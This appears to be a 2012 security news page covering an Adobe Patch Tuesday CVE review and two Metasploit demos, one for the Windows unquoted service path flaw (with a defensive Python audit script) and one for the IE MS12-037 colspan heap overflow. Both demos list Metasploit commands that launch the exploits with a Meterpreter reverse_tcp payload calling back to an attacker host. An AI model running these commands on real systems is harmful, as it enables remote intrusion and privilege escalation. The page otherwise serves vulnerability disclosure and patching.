ZATAZ WEBTV September 2012

If you understand French, you can watch our September 2012 Web TV show.

In this episode:

  • Defcon
  • PirateBox
  • Lock Picking
  • MegaUpload
  • Ethical hacking as taught at a French university
  • Interview with a French military general specialized in cyber security

Adobe August 2012 Patch Tuesday Review

Adobe released, on 14 August 2012, during its August Patch Tuesday, three security bulletins dealing with 26 vulnerabilities. All three bulletins have a Critical severity rating, and 23 of the 26 vulnerabilities have a CVSS base score of 10.0.

APSB12-16 – Security update for Adobe Reader and Acrobat

APSB12-16 concerns Adobe Reader and Acrobat X (10.1.3) and earlier versions for Windows and Macintosh. 20 vulnerabilities are fixed in these updates; all of them are classified as Critical and allow code execution. 18 of the 20 vulnerabilities have a CVSS base score of 10.0.

CVE-2012-4149, CVE-2012-4150, CVE-2012-4151, CVE-2012-4152, CVE-2012-4153, CVE-2012-4154, CVE-2012-4155, CVE-2012-4156, CVE-2012-4157, CVE-2012-4158, CVE-2012-4159 and CVE-2012-4160 have been discovered and privately reported by Mateusz Jurczyk and Gynvael Coldwind, of the Google Security Team. All these vulnerabilities have a CVSS base score of 10.0.

CVE-2012-4147 (CVSS base score of 10.0), CVE-2012-4161 (CVSS base score of 7.5) and CVE-2012-4162 (CVSS base score of 7.5) have been discovered and privately reported by James Quirk.

CVE-2012-2051, with a CVSS base score of 10.0, has been discovered and privately reported by Mateusz Jurczyk of the Google Security Team.

CVE-2012-2049, with a CVSS base score of 10.0, has been discovered and privately reported by Pavel Polischouk of the Vulnerability Research team at TELUS Security Labs.

CVE-2012-2050, with a CVSS base score of 10.0, has been discovered and privately reported by an anonymous contributor working with Beyond Security’s SecuriTeam Secure Disclosure Program.

CVE-2012-4148, with a CVSS score of 10.0, has been discovered and privately reported by John Leitch at Microsoft and Microsoft Vulnerability Research (MSVR).

CVE-2012-1525, with a CVSS score of 10.0, has been discovered and privately reported by Nicolas Grégoire through iDefense’s Vulnerability Contributor Program.

Despite the high number of fixed vulnerabilities, Adobe Reader for Linux has not been updated and remains exposed to vulnerabilities that are now known and fixed in the Windows and Macintosh versions. Adobe plans to release an out-of-band update for Adobe Reader for Linux before 27 August.

APSB12-17 – Security update for Adobe Shockwave Player

APSB12-17 concerns Adobe Shockwave Player 11.6.5.635 and earlier versions for Windows and Macintosh. 5 vulnerabilities are fixed in these updates; all of them are classified as Critical and allow code execution. All these vulnerabilities have a CVSS base score of 10.0.

CVE-2012-2043, CVE-2012-2046 and CVE-2012-2047 have been discovered and privately reported by Honggang Ren of Fortinet’s FortiGuard Labs. All these vulnerabilities have a CVSS base score of 10.0.

CVE-2012-2045, with a CVSS base score of 10.0, has been discovered and privately reported by Will Dormann of CERT.

CVE-2012-2044, with a CVSS base score of 10.0, has been discovered and privately reported by suto.

APSB12-18 – Security update for Adobe Flash Player

APSB12-18 concerns Adobe Flash Player 11.3.300.270 and earlier versions for Windows, Macintosh and Linux.

CVE-2012-1535, with a CVSS base score of 9.3, has been discovered being exploited in the wild in limited targeted attacks, distributed through a malicious Word document. The exploit targets the ActiveX version of Flash Player for Internet Explorer on Windows. Since 18 August, however, a Metasploit module has been available that does not require forging a malicious Word document. The Metasploit module currently targets Windows XP SP3 and is still quite unstable, but you should urgently update your Flash Player.

Windows Service Trusted Path Privilege Escalation Vulnerability Metasploit Demo

Timeline:

Metasploit PoC provided on 2012-08-14

PoC provided by:

sinn3r

Reference(s):

None

Affected version(s):

All Microsoft Windows versions, with applications installed under unexpected (unquoted, space-containing) paths

Tested on Windows XP Pro SP3 with:

OpenVPN 2.1.1

Description:

This module exploits a logic flaw in how the lpApplicationName parameter is handled. When lpApplicationName contains a space, the file name is ambiguous. Take this file path as an example: C:\program files\hello.exe. The Windows API will try to interpret this as two possible paths, C:\program.exe and C:\program files\hello.exe, and then execute all of them. To some software developers this is unexpected behaviour, and it becomes a security problem if an attacker is able to place a malicious executable in one of these unexpected paths, sometimes escalating privileges if the service runs as SYSTEM. Some software such as OpenVPN 2.1.1, OpenSSH Server 5, and others have the same problem. The offensive technique is also described in Writing Secure Code (2nd Edition), Chapter 23, in the section “Calling Processes Securely” on page 676.
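The path-splitting rule described above is easy to audit for on your own hosts. The following Python script is an added example, not code from the Metasploit module or from the original post: it takes service command lines (the ImagePath values you would read from the registry or from `sc qc <service>`), enumerates the "unexpected" executables CreateProcess would look for before reaching the intended binary, and prints the quoted form that removes the ambiguity. It implements the general rule (one candidate per space-delimited prefix, with .exe appended), of which the page's C:\program files\hello.exe → C:\program.exe case is one instance; the service table is constructed for illustration, with the OpenVPN entry modelled on the OpenVPN 2.1.1 case named on the page.

```python
"""Audit Windows service command lines for unquoted-path ambiguity.

Added example, not part of the Metasploit module or the original post.
The SERVICES table below is constructed; real values come from
HKLM\\SYSTEM\\CurrentControlSet\\Services\\<name>\\ImagePath or `sc qc`.
"""


def executable_end(tokens):
    """Index of the token that ends the executable: the first token ending
    in .exe, or the last token when none does (assumption: service command
    lines name the binary with its .exe extension, which is typical)."""
    for i, tok in enumerate(tokens):
        if tok.lower().endswith(".exe"):
            return i
    return len(tokens) - 1


def candidate_paths(image_path):
    """Return the 'unexpected' executables CreateProcess would look for
    before the intended one.  For an unquoted path CreateProcess tries each
    space-delimited prefix with .exe appended and runs the first file that
    exists, so a binary planted at any of these paths runs in place of the
    real service.  Quoted paths and paths without spaces are unambiguous
    and yield an empty list.  Example: C:\\program files\\hello.exe gives
    ['C:\\program.exe']."""
    image_path = image_path.strip()
    if image_path.startswith('"'):
        return []
    tokens = image_path.split(" ")
    end = executable_end(tokens)
    return [" ".join(tokens[: i + 1]) + ".exe" for i in range(end)]


def quote_image_path(image_path):
    """Remediated form: wrap the executable part in double quotes and keep
    any arguments untouched."""
    image_path = image_path.strip()
    if image_path.startswith('"'):
        return image_path
    tokens = image_path.split(" ")
    end = executable_end(tokens)
    exe = " ".join(tokens[: end + 1])
    args = tokens[end + 1 :]
    return '"' + exe + '"' + (" " + " ".join(args) if args else "")


# Constructed sample: service name -> ImagePath.  The OpenVPN entry is
# modelled on the OpenVPN 2.1.1 case named on the page; the others are
# invented to cover a spaceless path, a quoted path and a path with arguments.
SERVICES = {
    "OpenVPNService": r"C:\Program Files\OpenVPN\bin\openvpnserv.exe",
    "Spooler": r"C:\Windows\System32\spoolsv.exe",
    "VendorSvcQuoted": r'"C:\Program Files\Vendor App\svc.exe" -k service',
    "VendorSvcUnquoted": r"C:\Program Files\Vendor App\svc.exe -k service",
}


def audit_services(services):
    """Map each ambiguous service to the paths CreateProcess tries first."""
    findings = {}
    for name, path in services.items():
        unexpected = candidate_paths(path)
        if unexpected:
            findings[name] = unexpected
    return findings


if __name__ == "__main__":
    for name, paths in audit_services(SERVICES).items():
        print(f"{name}: unquoted path, CreateProcess would first try:")
        for p in paths:
            print("    " + p)
        print("  fix: " + quote_image_path(SERVICES[name]))
```

A finding only matters when one of the listed parent directories (C:\ or C:\Program Files in the sample) is writable by non-administrators, so pair this output with an ACL check on those directories; the fix itself is simply the quoted ImagePath the script prints.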

Commands:

You need a valid session on the target, obtained for example with:

exploit/windows/browser/ms12_037_same_id

Then run the following exploit to detect vulnerable services:

use exploit/windows/local/trusted_service_path
set SESSION 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
set LPORT 4443
exploit

sysinfo
getuid

MS12-037 Internet Explorer CVE-2012-1876 Vulnerability Metasploit Demo

Timeline:

Vulnerability discovered by VUPEN Security and reported to ZDI
Vulnerability reported to the vendor by ZDI on 2012-03-14
Public release of the vulnerability on 2012-06-12
Details of the vulnerability provided by VUPEN on 2012-07-10
Metasploit PoC provided on 2012-07-31

PoC provided by:

Alexandre Pelletier
mr_me
binjo
sinn3r
juan vazquez

Reference(s):

MS12-037
CVE-2012-1876
OSVDB-82866
ZDI-12-093

Affected version(s):

Internet Explorer 6
Internet Explorer 7
Internet Explorer 8
Internet Explorer 9

Tested on Windows XP Pro SP3 with:

Internet Explorer 8 (8.0.6001.18702) and msvcrt ROP

Description:

This module exploits a heap overflow vulnerability in Internet Explorer caused by incorrect handling of the span attribute of col elements in a fixed-layout table when they are modified dynamically by JavaScript code.

Commands:

use exploit/windows/browser/ms12_037_ie_colspan
set SRVHOST 192.168.178.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid